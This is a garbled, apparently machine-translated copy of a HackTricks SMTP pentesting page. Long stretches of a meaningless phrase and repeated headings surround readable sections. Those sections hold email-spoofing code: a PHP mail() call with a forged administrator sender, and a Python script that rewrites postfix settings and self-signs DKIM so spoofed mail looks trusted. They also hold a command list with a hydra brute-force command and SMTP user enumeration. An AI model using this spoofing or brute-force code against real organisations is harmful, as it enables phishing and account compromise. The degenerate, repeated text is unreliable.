vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlhutlh. vItlhutlh 'e' vItlh

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Tools

https://github.com/serain/mailspoof SPF je DMARC misconfigurations laH
https://pypi.org/project/checkdmarc/ SPF je DMARC configs Automatic ghaH

Send Spoof Email

Or you could use a tool:

https://github.com/magichk/magicspoofing

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

{% hint style="warning" %} ghobe' dkim python lib vItlhutlh error ghItlh 'e' key parsing vItlhutlh 'e' 'ej vItlhutlh 'e' 'ej 'ej openssl private key dkim 'e' 'e' parsed reason 'e' 'ej 'e' 'ej quick checks 'e' 'ej.

NOTE: 'oH 'e' dirty fix 'e' 'ej quick checks 'e' 'ej openssl private key dkim 'e' 'e' parsed 'e' 'ej.

{% endhint %}

ghobe' manually vItlhutlh:

{% tabs %} {% tab title="PHP" %}

# vaj unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

{% endtab %}

{% tab title="Python" %}

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

{% endtab %} {% endtabs %}

More info

Find more information about these protections in https://seanthegeek.net/459/demystifying-dmarc/

Other phishing indicators

Domain’s age
Links pointing to IP addresses
Link manipulation techniques
Suspicious (uncommon) attachments
Broken email content
Values used that are different to those of the mail headers
Existence of a valid and trusted SSL certificate
Submission of the page to web content filtering sites

Exfiltration through SMTP

If you can send data via SMTP read this.

Config file

Postfix

Usually, if installed, in /etc/postfix/master.cf contains scripts to execute when for example a new mail is receipted by a user. For example the line flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} means that /etc/postfix/filtering will be executed if a new mail is received by the user mark.

Other config files:

sendmail.cf
submit.cf

References

HackTricks Automatic Commands

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.xyz/pentesting/pentesting-smtp

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

{% embed url="https://pentest-tools.com/" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

README.md Unescape Escape

25,465,587 - Pentesting SMTP/s

Basic Information

EMAIL Headers

Basic actions

Banner Grabbing/Basic connection

QaparHa' 'ej ponglu'pu' 'e' yu'wIjDIvchugh vItlhutlh

Method 1: Using nslookup

Method 2: Using dig

Method 3: Online Tools

QaparHa' 'ej ponglu'pu' 'e' yu'wIjDIvchugh vItlhutlh

yuQjIjDIv 1: 'ej 'oH nslookup

yuQjIjDIv 2: 'ej 'oH dig

yuQjIjDIv 3: Online Tools

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

QaDmey

README.md

Method 1: Using `nslookup`

Method 2: Using `dig`

yuQjIjDIv 1: 'ej 'oH `nslookup`

yuQjIjDIv 2: 'ej 'oH `dig`